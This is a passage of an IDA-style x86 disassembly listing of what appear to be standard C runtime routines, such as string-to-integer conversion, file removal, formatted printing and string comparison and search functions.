sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov [ebp+var_C], 0
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_41F134: ; CODE XREF: sub_41F110+77�j
cmp ds:dword_453DF0, 1
jle short loc_41F156
push 8
mov ecx, [ebp+var_8]
and ecx, 0FFh
push ecx
call sub_427040
add esp, 8
mov [ebp+var_18], eax
jmp short loc_41F170
; ---------------------------------------------------------------------------
loc_41F156: ; CODE XREF: sub_41F110+2B�j
mov edx, [ebp+var_8]
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8
mov [ebp+var_18], ecx
loc_41F170: ; CODE XREF: sub_41F110+44�j
cmp [ebp+var_18], 0
jz short loc_41F189
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_8], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_41F134
; ---------------------------------------------------------------------------
loc_41F189: ; CODE XREF: sub_41F110+64�j
movsx edx, byte ptr [ebp+var_8]
cmp edx, 2Dh
jnz short loc_41F1AD
mov eax, [ebp+arg_C]
or al, 2
mov [ebp+arg_C], eax
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_41F1C7
; ---------------------------------------------------------------------------
loc_41F1AD: ; CODE XREF: sub_41F110+80�j
movsx ecx, byte ptr [ebp+var_8]
cmp ecx, 2Bh
jnz short loc_41F1C7
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_8], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_41F1C7: ; CODE XREF: sub_41F110+9B�j
; sub_41F110+A4�j
cmp [ebp+arg_8], 0
jl short loc_41F1D9
cmp [ebp+arg_8], 1
jz short loc_41F1D9
cmp [ebp+arg_8], 24h
jle short loc_41F1EE
loc_41F1D9: ; CODE XREF: sub_41F110+BB�j
; sub_41F110+C1�j
cmp [ebp+arg_4], 0
jz short loc_41F1E7
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov [edx], eax
loc_41F1E7: ; CODE XREF: sub_41F110+CD�j
xor eax, eax
jmp loc_41F43D
; ---------------------------------------------------------------------------
loc_41F1EE: ; CODE XREF: sub_41F110+C7�j
cmp [ebp+arg_8], 0
jnz short loc_41F22C
movsx ecx, byte ptr [ebp+var_8]
cmp ecx, 30h
jz short loc_41F206
mov [ebp+arg_8], 0Ah
jmp short loc_41F22C
; ---------------------------------------------------------------------------
loc_41F206: ; CODE XREF: sub_41F110+EB�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 78h
jz short loc_41F21C
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 58h
jnz short loc_41F225
loc_41F21C: ; CODE XREF: sub_41F110+FF�j
mov [ebp+arg_8], 10h
jmp short loc_41F22C
; ---------------------------------------------------------------------------
loc_41F225: ; CODE XREF: sub_41F110+10A�j
mov [ebp+arg_8], 8
loc_41F22C: ; CODE XREF: sub_41F110+E2�j
; sub_41F110+F4�j ...
cmp [ebp+arg_8], 10h
jnz short loc_41F26B
movsx eax, byte ptr [ebp+var_8]
cmp eax, 30h
jnz short loc_41F26B
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 78h
jz short loc_41F251
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 58h
jnz short loc_41F26B
loc_41F251: ; CODE XREF: sub_41F110+134�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov cl, [eax]
mov byte ptr [ebp+var_8], cl
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_41F26B: ; CODE XREF: sub_41F110+120�j
; sub_41F110+129�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov [ebp+var_10], eax
loc_41F276: ; CODE XREF: sub_41F110+26B�j
cmp ds:dword_453DF0, 1
jle short loc_41F297
push 4
mov eax, [ebp+var_8]
and eax, 0FFh
push eax
call sub_427040
add esp, 8
mov [ebp+var_1C], eax
jmp short loc_41F2B2
; ---------------------------------------------------------------------------
loc_41F297: ; CODE XREF: sub_41F110+16D�j
mov ecx, [ebp+var_8]
and ecx, 0FFh
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp+var_1C], eax
loc_41F2B2: ; CODE XREF: sub_41F110+185�j
cmp [ebp+var_1C], 0
jz short loc_41F2C4
movsx ecx, byte ptr [ebp+var_8]
sub ecx, 30h
mov [ebp+var_14], ecx
jmp short loc_41F323
; ---------------------------------------------------------------------------
loc_41F2C4: ; CODE XREF: sub_41F110+1A6�j
cmp ds:dword_453DF0, 1
jle short loc_41F2E9
push 103h
mov edx, [ebp+var_8]
and edx, 0FFh
push edx
call sub_427040
add esp, 8
mov [ebp+var_20], eax
jmp short loc_41F306
; ---------------------------------------------------------------------------
loc_41F2E9: ; CODE XREF: sub_41F110+1BB�j
mov eax, [ebp+var_8]
and eax, 0FFh
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 103h
mov [ebp+var_20], edx
loc_41F306: ; CODE XREF: sub_41F110+1D7�j
cmp [ebp+var_20], 0
jz short loc_41F321
movsx eax, byte ptr [ebp+var_8]
push eax
call sub_429AC0
add esp, 4
sub eax, 37h
mov [ebp+var_14], eax
jmp short loc_41F323
; ---------------------------------------------------------------------------
loc_41F321: ; CODE XREF: sub_41F110+1FA�j
jmp short loc_41F380
; ---------------------------------------------------------------------------
loc_41F323: ; CODE XREF: sub_41F110+1B2�j
; sub_41F110+20F�j
mov ecx, [ebp+var_14]
cmp ecx, [ebp+arg_8]
jb short loc_41F32D
jmp short loc_41F380
; ---------------------------------------------------------------------------
loc_41F32D: ; CODE XREF: sub_41F110+219�j
mov edx, [ebp+arg_C]
or edx, 8
mov [ebp+arg_C], edx
mov eax, [ebp+var_C]
cmp eax, [ebp+var_10]
jb short loc_41F353
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_10]
jnz short loc_41F362
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp [ebp+var_14], edx
ja short loc_41F362
loc_41F353: ; CODE XREF: sub_41F110+22C�j
mov edx, [ebp+var_C]
imul edx, [ebp+arg_8]
add edx, [ebp+var_14]
mov [ebp+var_C], edx
jmp short loc_41F36A
; ---------------------------------------------------------------------------
loc_41F362: ; CODE XREF: sub_41F110+234�j
; sub_41F110+241�j
mov eax, [ebp+arg_C]
or al, 4
mov [ebp+arg_C], eax
loc_41F36A: ; CODE XREF: sub_41F110+250�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp loc_41F276
; ---------------------------------------------------------------------------
loc_41F380: ; CODE XREF: sub_41F110:loc_41F321�j
; sub_41F110+21B�j
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_C]
and edx, 8
test edx, edx
jnz short loc_41F3A8
cmp [ebp+arg_4], 0
jz short loc_41F39F
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41F39F: ; CODE XREF: sub_41F110+287�j
mov [ebp+var_C], 0
jmp short loc_41F41A
; ---------------------------------------------------------------------------
loc_41F3A8: ; CODE XREF: sub_41F110+281�j
mov ecx, [ebp+arg_C]
and ecx, 4
test ecx, ecx
jnz short loc_41F3E2
mov edx, [ebp+arg_C]
and edx, 1
test edx, edx
jnz short loc_41F41A
mov eax, [ebp+arg_C]
and eax, 2
test eax, eax
jz short loc_41F3CF
cmp [ebp+var_C], 80000000h
ja short loc_41F3E2
loc_41F3CF: ; CODE XREF: sub_41F110+2B4�j
mov ecx, [ebp+arg_C]
and ecx, 2
test ecx, ecx
jnz short loc_41F41A
cmp [ebp+var_C], 7FFFFFFFh
jbe short loc_41F41A
loc_41F3E2: ; CODE XREF: sub_41F110+2A0�j
; sub_41F110+2BD�j
call sub_429A90
mov dword ptr [eax], 22h
mov edx, [ebp+arg_C]
and edx, 1
test edx, edx
jz short loc_41F400
mov [ebp+var_C], 0FFFFFFFFh
jmp short loc_41F41A
; ---------------------------------------------------------------------------
loc_41F400: ; CODE XREF: sub_41F110+2E5�j
mov eax, [ebp+arg_C]
and eax, 2
test eax, eax
jz short loc_41F413
mov [ebp+var_C], 80000000h
jmp short loc_41F41A
; ---------------------------------------------------------------------------
loc_41F413: ; CODE XREF: sub_41F110+2F8�j
mov [ebp+var_C], 7FFFFFFFh
loc_41F41A: ; CODE XREF: sub_41F110+296�j
; sub_41F110+2AA�j ...
cmp [ebp+arg_4], 0
jz short loc_41F428
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
loc_41F428: ; CODE XREF: sub_41F110+30E�j
mov eax, [ebp+arg_C]
and eax, 2
test eax, eax
jz short loc_41F43A
mov ecx, [ebp+var_C]
neg ecx
mov [ebp+var_C], ecx
loc_41F43A: ; CODE XREF: sub_41F110+320�j
mov eax, [ebp+var_C]
loc_41F43D: ; CODE XREF: sub_41F110+D9�j
mov esp, ebp
pop ebp
retn
sub_41F110 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F450 proc near ; CODE XREF: sub_401C87+627F�p
; sub_401C87+6AA8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_41F110
add esp, 10h
pop ebp
retn
sub_41F450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F470 proc near ; CODE XREF: sub_401C87+5A23�p
; _0:0041F4C7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5354 ; DeleteFileA
test eax, eax
jnz short loc_41F48D
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_4], eax
jmp short loc_41F494
; ---------------------------------------------------------------------------
loc_41F48D: ; CODE XREF: sub_41F470+10�j
mov [ebp+var_4], 0
loc_41F494: ; CODE XREF: sub_41F470+1B�j
cmp [ebp+var_4], 0
jz short loc_41F4AB
mov ecx, [ebp+var_4]
push ecx
call sub_4299F0
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_41F4AD
; ---------------------------------------------------------------------------
loc_41F4AB: ; CODE XREF: sub_41F470+28�j
xor eax, eax
loc_41F4AD: ; CODE XREF: sub_41F470+39�j
mov esp, ebp
pop ebp
retn
sub_41F470 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call sub_41F470
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F4E0 proc near ; CODE XREF: sub_401C87+598F�p
; sub_4124E6+8C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
mov [ebp+var_10], eax
loc_41F4EF: ; CODE XREF: sub_41F4E0+37�j
cmp [ebp+arg_0], 0
jnz short loc_41F513
push offset dword_43C514
push 0
push 38h
push offset aFprintf_c ; "fprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41F513
int 3 ; Trap to Debugger
loc_41F513: ; CODE XREF: sub_41F4E0+13�j
; sub_41F4E0+30�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41F4EF
loc_41F519: ; CODE XREF: sub_41F4E0+61�j
cmp [ebp+arg_4], 0
jnz short loc_41F53D
push offset aFormatNull ; "format != NULL"
push 0
push 39h
push offset aFprintf_c ; "fprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41F53D
int 3 ; Trap to Debugger
loc_41F53D: ; CODE XREF: sub_41F4E0+3D�j
; sub_41F4E0+5A�j
xor edx, edx
test edx, edx
jnz short loc_41F519
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
push ecx
call sub_422420
add esp, 4
mov edx, [ebp+var_4]
push edx
call sub_429C90
add esp, 4
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_427F60
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_429DF0
add esp, 8
mov edx, [ebp+var_4]
push edx
call sub_422490
add esp, 4
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41F4E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5B0 proc near ; CODE XREF: sub_401C87+1E2E�p
; sub_401C87+1E4D�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_41F5D1
xor eax, eax
jmp short loc_41F5D3
; ---------------------------------------------------------------------------
loc_41F5D1: ; CODE XREF: sub_41F5B0+1B�j
mov eax, edi
loc_41F5D3: ; CODE XREF: sub_41F5B0+1F�j
cld
pop edi
leave
retn
sub_41F5B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5E0 proc near ; CODE XREF: sub_401C87+825�p
; sub_426C90+BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_41F611
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_41F60F
jz short loc_41F611
dec ecx
dec ecx
loc_41F60F: ; CODE XREF: sub_41F5E0+29�j
not ecx
loc_41F611: ; CODE XREF: sub_41F5E0+9�j
; sub_41F5E0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_41F5E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41F620 proc near ; CODE XREF: sub_401C87+418�p
; sub_401C87+3012�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41F691
sub_41F620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41F630 proc near ; CODE XREF: sub_401C87+421�p
; sub_401C87+767D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41F64C
loc_41F63D: ; CODE XREF: sub_41F630+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41F67F
test ecx, 3
jnz short loc_41F63D
loc_41F64C: ; CODE XREF: sub_41F630+B�j
; sub_41F630+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41F64C
mov eax, [ecx-4]
test al, al
jz short loc_41F68E
test ah, ah
jz short loc_41F689
test eax, 0FF0000h
jz short loc_41F684
test eax, 0FF000000h
jz short loc_41F67F
jmp short loc_41F64C
; ---------------------------------------------------------------------------
loc_41F67F: ; CODE XREF: sub_41F630+12�j
; sub_41F630+4B�j
lea edi, [ecx-1]
jmp short loc_41F691
; ---------------------------------------------------------------------------
loc_41F684: ; CODE XREF: sub_41F630+44�j
lea edi, [ecx-2]
jmp short loc_41F691
; ---------------------------------------------------------------------------
loc_41F689: ; CODE XREF: sub_41F630+3D�j
lea edi, [ecx-3]
jmp short loc_41F691
; ---------------------------------------------------------------------------
loc_41F68E: ; CODE XREF: sub_41F630+39�j
lea edi, [ecx-4]
loc_41F691: ; CODE XREF: sub_41F620+5�j
; sub_41F630+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41F6B6
loc_41F69D: ; CODE XREF: sub_41F630+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_41F708
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_41F69D
jmp short loc_41F6B6
; ---------------------------------------------------------------------------
loc_41F6B1: ; CODE XREF: sub_41F630+9E�j
; sub_41F630+B8�j
mov [edi], edx
add edi, 4
loc_41F6B6: ; CODE XREF: sub_41F630+6B�j
; sub_41F630+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41F6B1
test dl, dl
jz short loc_41F708
test dh, dh
jz short loc_41F6FF
test edx, 0FF0000h
jz short loc_41F6F2
test edx, 0FF000000h
jz short loc_41F6EA
jmp short loc_41F6B1
; ---------------------------------------------------------------------------
loc_41F6EA: ; CODE XREF: sub_41F630+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41F6F2: ; CODE XREF: sub_41F630+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41F6FF: ; CODE XREF: sub_41F630+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41F708: ; CODE XREF: sub_41F630+72�j
; sub_41F630+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41F630 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F720
loc_41F710: ; CODE XREF: sub_41F720+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_41F720
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41F720 proc near ; CODE XREF: sub_401C87+3FD�p
; sub_401C87+49E�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0041F710 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_41F726: ; CODE XREF: sub_41EBB0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41F74B
loc_41F738: ; CODE XREF: sub_41F720+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_41F710
test cl, cl
jz short loc_41F794
test edx, 3
jnz short loc_41F738
loc_41F74B: ; CODE XREF: sub_41F720+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_41F756: ; CODE XREF: sub_41F720+61�j
; sub_41F720+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_41F798
and eax, 81010100h
jz short loc_41F756
and eax, 1010100h
jnz short loc_41F792
and esi, 80000000h
jnz short loc_41F756
loc_41F792: ; CODE XREF: sub_41F720+68�j
; sub_41F720+81�j ...
pop esi
pop edi
loc_41F794: ; CODE XREF: sub_41F720+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41F798: ; CODE XREF: sub_41F720+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_41F7D5
test al, al
jz short loc_41F792
cmp ah, bl
jz short loc_41F7CE
test ah, ah
jz short loc_41F792
shr eax, 10h
cmp al, bl
jz short loc_41F7C7
test al, al
jz short loc_41F792
cmp ah, bl
jz short loc_41F7C0
test ah, ah
jz short loc_41F792
jmp short loc_41F756
; ---------------------------------------------------------------------------
loc_41F7C0: ; CODE XREF: sub_41F720+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F7C7: ; CODE XREF: sub_41F720+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F7CE: ; CODE XREF: sub_41F720+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F7D5: ; CODE XREF: sub_41F720+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_41F720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41F7E0 proc near ; CODE XREF: sub_401C87+1A2�p
; sub_401C87+1F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41F82C
loc_41F7F0: ; CODE XREF: sub_41F7E0+3C�j
; sub_41F7E0+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41F824
or al, al
jz short loc_41F820
cmp ah, [ecx+1]
jnz short loc_41F824
or ah, ah
jz short loc_41F820
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41F824
or al, al
jz short loc_41F820
cmp ah, [ecx+3]
jnz short loc_41F824
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41F7F0
mov edi, edi
loc_41F820: ; CODE XREF: sub_41F7E0+18�j
; sub_41F7E0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41F824: ; CODE XREF: sub_41F7E0+14�j
; sub_41F7E0+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41F82C: ; CODE XREF: sub_41F7E0+E�j
test edx, 1
jz short loc_41F848
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_41F824
inc ecx
or al, al
jz short loc_41F820
test edx, 2
jz short loc_41F7F0
loc_41F848: ; CODE XREF: sub_41F7E0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41F824
or al, al
jz short loc_41F820
cmp ah, [ecx+1]
jnz short loc_41F824
or ah, ah
jz short loc_41F820
add ecx, 2
jmp short loc_41F7F0
sub_41F7E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F870 proc near ; CODE XREF: sub_401C87+B4�p
; sub_401C87+CD�p ...
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_4]
mov [ebp+var_30], eax
call sub_428EE0
mov [ebp+var_8], eax
mov [ebp+var_C], 0
jmp short loc_41F896
; ---------------------------------------------------------------------------
loc_41F88D: ; CODE XREF: sub_41F870+34�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_41F896: ; CODE XREF: sub_41F870+1B�j
cmp [ebp+var_C], 20h
jge short loc_41F8A6
mov edx, [ebp+var_C]
mov [ebp+edx+var_2C], 0
jmp short loc_41F88D
; ---------------------------------------------------------------------------
loc_41F8A6: ; CODE XREF: sub_41F870+2A�j
; sub_41F870+79�j
mov eax, [ebp+var_30]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
sar edx, 3
mov eax, [ebp+var_30]
xor ecx, ecx
mov cl, [eax]
and ecx, 7
mov eax, 1
shl eax, cl
mov cl, [ebp+edx+var_2C]
or cl, al
mov edx, [ebp+var_30]
xor eax, eax
mov al, [edx]
sar eax, 3
mov [ebp+eax+var_2C], cl
mov ecx, [ebp+var_30]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+var_30]
add eax, 1
mov [ebp+var_30], eax
test edx, edx
jnz short loc_41F8A6
cmp [ebp+arg_0], 0
jz short loc_41F8F9
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
jmp short loc_41F902
; ---------------------------------------------------------------------------
loc_41F8F9: ; CODE XREF: sub_41F870+7F�j
mov edx, [ebp+var_8]
mov eax, [edx+18h]
mov [ebp+var_4], eax
loc_41F902: ; CODE XREF: sub_41F870+87�j
; sub_41F870+CF�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
sar edx, 3
xor eax, eax
mov al, [ebp+edx+var_2C]
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, edx
and ecx, 7
mov edx, 1
shl edx, cl
and eax, edx
test eax, eax
jz short loc_41F941
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_41F941
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_41F902
; ---------------------------------------------------------------------------
loc_41F941: ; CODE XREF: sub_41F870+B9�j
; sub_41F870+C4�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
jmp short loc_41F952
; ---------------------------------------------------------------------------
loc_41F949: ; CODE XREF: sub_41F870:loc_41F997�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_41F952: ; CODE XREF: sub_41F870+D7�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_41F999
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
sar edx, 3
xor eax, eax
mov al, [ebp+edx+var_2C]
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, edx
and ecx, 7
mov edx, 1
shl edx, cl
and eax, edx
test eax, eax
jz short loc_41F997
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_41F999
; ---------------------------------------------------------------------------
loc_41F997: ; CODE XREF: sub_41F870+114�j
jmp short loc_41F949
; ---------------------------------------------------------------------------
loc_41F999: ; CODE XREF: sub_41F870+EB�j
; sub_41F870+125�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_4]
mov [edx+18h], eax
mov ecx, [ebp+arg_0]
cmp ecx, [ebp+var_4]
jnz short loc_41F9AE
xor eax, eax
jmp short loc_41F9B1
; ---------------------------------------------------------------------------
loc_41F9AE: ; CODE XREF: sub_41F870+138�j
mov eax, [ebp+arg_0]
loc_41F9B1: ; CODE XREF: sub_41F870+13C�j
mov esp, ebp
pop ebp
retn
sub_41F870 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F9C0 proc near ; CODE XREF: sub_409C2F+1C�p
; sub_415AB0+19�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
loc_41F9CF: ; CODE XREF: sub_41F9C0+37�j
cmp [ebp+arg_0], 0
jnz short loc_41F9F3
push offset aStringNull ; "string != NULL"
push 0
push 5Ah
push offset aVsprintf_c ; "vsprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41F9F3
int 3 ; Trap to Debugger
loc_41F9F3: ; CODE XREF: sub_41F9C0+13�j
; sub_41F9C0+30�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41F9CF
loc_41F9F9: ; CODE XREF: sub_41F9C0+61�j
cmp [ebp+arg_8], 0
jnz short loc_41FA1D
push offset aFormatNull ; "format != NULL"
push 0
push 5Bh
push offset aVsprintf_c ; "vsprintf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41FA1D
int 3 ; Trap to Debugger
loc_41FA1D: ; CODE XREF: sub_41F9C0+3D�j
; sub_41F9C0+5A�j
xor edx, edx
test edx, edx
jnz short loc_41F9F9
mov eax, [ebp+var_24]
mov dword ptr [eax+0Ch], 42h
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx+8], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_24]
mov eax, [ebp+arg_4]
mov [edx+4], eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+var_24]
push eax
call sub_427F60
add esp, 0Ch
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+var_24]
mov [eax+4], edx
mov ecx, [ebp+var_24]
cmp dword ptr [ecx+4], 0
jl short loc_41FA98
mov edx, [ebp+var_24]
mov eax, [edx]
